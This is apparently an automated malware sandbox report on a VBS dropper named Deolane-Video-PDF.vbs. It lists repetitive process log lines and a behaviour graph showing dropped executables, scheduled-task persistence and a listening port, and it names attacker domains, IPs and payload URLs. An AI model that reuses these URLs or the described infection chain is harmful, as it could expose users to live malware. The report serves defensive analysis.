Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\_bz2.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002\_lzma.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI79002 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Queries volume information: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC1B4C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 15_2_00007FF7ADC1B4C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC34D50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 15_2_00007FF7ADC34D50
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E5DB7 bind,WSAGetLastError, 16_2_00007FFD839E5DB7
Source: C:\Users\user\AppData\Roaming\Software\registry_4131f52c.exe Code function: 24_2_00007FFD83145DB7 bind,WSAGetLastError, 24_2_00007FFD83145DB7
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523262 Sample: Deolane-Video-PDF.vbs Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 84 estudosadulto.educacao.ws 2->84 86 almeidadoprogresso.siteoficial.ws 2->86 88 pontoslivelobb.servicos.ws 2->88 100 Multi AV Scanner detection for domain / URL 2->100 102 Potential malicious VBS script found (suspicious strings) 2->102 104 Potential malicious VBS script found (has network functionality) 2->104 106 6 other signatures 2->106 9 wscript.exe 1 2->9         started        12 bOamY.exe 90 2->12         started        15 registry_4131f52c.exe 90 2->15         started        signatures3 process4 file5 110 Benign windows process drops PE files 9->110 112 VBScript performs obfuscated calls to suspicious functions 9->112 114 Uses schtasks.exe or at.exe to add and modify task schedules 9->114 116 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->116 17 wscript.exe 1 17 9->17         started        64 C:\Users\user\AppData\Local\...\win32wnet.pyd, PE32+ 12->64 dropped 66 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 12->66 dropped 68 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 12->68 dropped 76 65 other files (none is malicious) 12->76 dropped 118 Potentially malicious time measurement code found 12->118 22 bOamY.exe 3 12->22         started        70 C:\Users\user\AppData\Local\...\win32wnet.pyd, PE32+ 15->70 dropped 72 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 15->72 dropped 74 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 15->74 dropped 78 65 other files (none is malicious) 15->78 dropped 24 registry_4131f52c.exe 15->24         started        signatures6 process7 dnsIp8 80 almeidadoprogresso.siteoficial.ws 45.89.247.53, 443, 49699 CMCSUS United Kingdom 17->80 56 C:\Users\user\AppData\Local\Temp\...\wsx.exe, PE32+ 17->56 dropped 58 C:\Users\user\AppData\...\bOamY.exe (copy), PE32+ 17->58 dropped 60 C:\Users\user\AppData\Local\Temp\4wToa.zip, Zip 17->60 dropped 108 System process connects to network (likely due to code injection or exploit) 17->108 26 chrome.exe 1 17->26         started        29 schtasks.exe 1 17->29         started        82 pontoslivelobb.servicos.ws 191.252.83.191, 49719, 49722, 80 LocawebServicosdeInternetSABR Brazil 22->82 62 C:\Users\user\...\registry_4131f52c.exe, PE32+ 22->62 dropped 31 cmd.exe 1 22->31         started        33 cmd.exe 1 22->33         started        35 cmd.exe 1 24->35         started        file9 signatures10 process11 dnsIp12 94 192.168.2.6, 443, 49698, 49699 unknown unknown 26->94 96 192.168.2.4 unknown unknown 26->96 98 239.255.255.250 unknown Reserved 26->98 37 chrome.exe 26->37         started        40 chrome.exe 26->40         started        42 conhost.exe 29->42         started        44 conhost.exe 31->44         started        46 schtasks.exe 1 31->46         started        48 conhost.exe 33->48         started        50 schtasks.exe 1 33->50         started        52 conhost.exe 35->52         started        54 schtasks.exe 35->54         started        process13 dnsIp14 90 estudosadulto.educacao.ws 94.156.67.32, 443, 49703, 49704 TERASYST-ASBG Bulgaria 37->90 92 www.google.com 172.217.18.4, 443, 49709, 49726 GOOGLEUS United States 37->92
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.217.18.4
 www.google.com United States
15169 GOOGLEUS false
94.156.67.32
 estudosadulto.educacao.ws Bulgaria
31420 TERASYST-ASBG true
191.252.83.191
 pontoslivelobb.servicos.ws Brazil
27715 LocawebServicosdeInternetSABR false
45.89.247.53
 almeidadoprogresso.siteoficial.ws United Kingdom
33657 CMCSUS true
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.4
192.168.2.6

Contacted Domains

Name IP Active
www.google.com 172.217.18.4 true
pontoslivelobb.servicos.ws 191.252.83.191 true
almeidadoprogresso.siteoficial.ws 45.89.247.53 true
estudosadulto.educacao.ws 94.156.67.32 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://pontoslivelobb.servicos.ws/conta.php false unknown
https://almeidadoprogresso.siteoficial.ws/wsx.zip true unknown
https://estudosadulto.educacao.ws/deolane.mp4 false
    		unknown